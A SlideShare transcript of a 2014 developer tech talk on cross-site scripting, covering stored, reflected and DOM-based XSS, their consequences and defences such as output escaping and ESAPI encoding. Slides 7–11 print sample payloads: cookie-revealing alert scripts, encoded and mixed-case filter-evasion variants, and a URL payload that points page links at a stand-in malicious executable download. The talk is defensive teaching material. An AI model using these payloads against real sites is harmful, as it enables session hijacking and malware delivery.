Your SlideShare is downloading. ×
TechTalk - Cross Site Scripting XSS
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

TechTalk - Cross Site Scripting XSS

1,821
views

Published on

Jürgen Kranz and Justice Nanhou (Architecture and Development Department at axxessio) focused on Cross Site Scripting XSS during this TechTalk.

Jürgen Kranz and Justice Nanhou (Architecture and Development Department at axxessio) focused on Cross Site Scripting XSS during this TechTalk.

Published in: Technology

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,821
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
7
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Cross Site Scripting XSS TechTalk FEBRUARY 2014 DEPARTMENT: ARCHITECTURE AND DEVELOPMENT
  • 2. Table of Contents » » » » » » ^ Introduction Stored XSS Reflected XSS DOM Based XSS XSS Attack Consequences How to Protect Yourself 2
  • 3. Introduction https://www.owasp.org/index.php/Top_10_2013-Release_Notes ^ 3
  • 4. Introduction ^ XSS flaws occur whenever » application takes untrusted data and sends it to a web browser without proper validation and escaping It allows » attackers to execute scripts in the victim’s browser which can: » hijack user sessions, » deface web sites, or » redirect the user to malicious sites. 4
  • 5. Introduction https://www.youtube.com/watch?v=_Z9RQSnf8-g ^ 5
  • 6. Stored XSS Attacks ^ » The injected code is permanently stored on the target servers: » » » » Database Message forum Visitor log Comment field. … » The victim then retrieves the malicious script from the server when it requests the stored information 6
  • 7. Stored XSS Attacks ^ Test XSS, <script>alert(document.cookie)</script> 7
  • 8. Stored XSS Attacks ^ Test XSS, <script>alert(document.cookie)</script> 8
  • 9. Reflected XSS Attacks ^ » The injected code is reflected off the web server, such as in: » » » » An error message Search result An e-mail message Or any other response that includes some or all of the input sent to the server as part of the request 9
  • 10. Reflected XSS Attacks ^ http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script> 10
  • 11. Reflected XSS Attacks ^ Different syntax or enconding " onfocus="alert(document.cookie) "><script >alert(document.cookie)</script > "%3cscript%3ealert(document.cookie)%3c/script%3e "><ScRiPt>alert(document.cookie)</ScRiPt> 11
  • 12. DOM Based XSS ^ » The DOM, or Document Object Model, » is the structural format used to represent documents in a browser. » is the de-facto name for XSS bugs <script> document.write("Site is at: " + document.location.href + "."); </script> 12
  • 13. XSS Attack Consequences ^ » The consequence is the same regardless of whether it is stored, reflected or Dom based. » The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account. » It can also include the disclosure of end user files » installation of Trojan horse programs » redirect the user to some other page or site » modify presentation of content. 13
  • 14. How to Protect Yourself ^ » Escape Output Provided by Users HTML encode any <, >, &, ‘, “ or don’t allow it » Validate user data to make sure it meets your expectations Use an HTML Policy engine to validate or clean user-driven HTML in an outbound way Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes String safe = ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( "input" ) ); JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) ); 14
  • 15. Thank you for your attention!
  • 16. Additional Information ^ » OWASP YouTube Chanel https://www.youtube.com/watch?v=_Z9RQSnf8-g » OWASP https://www.owasp.org/index.php/XSS https://www.owasp.org/index.php/Testing_for_Cross_site_scripting » OWASP Protect ME https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevent ion_Cheat_Sheet » Obscurity by Security, and Other Techitudes by Adam Jon R. http://adamjonrichardson.com/2012/02/01/improving-xss-cross-site-scriptingprevention-in-four-simple-steps/ 16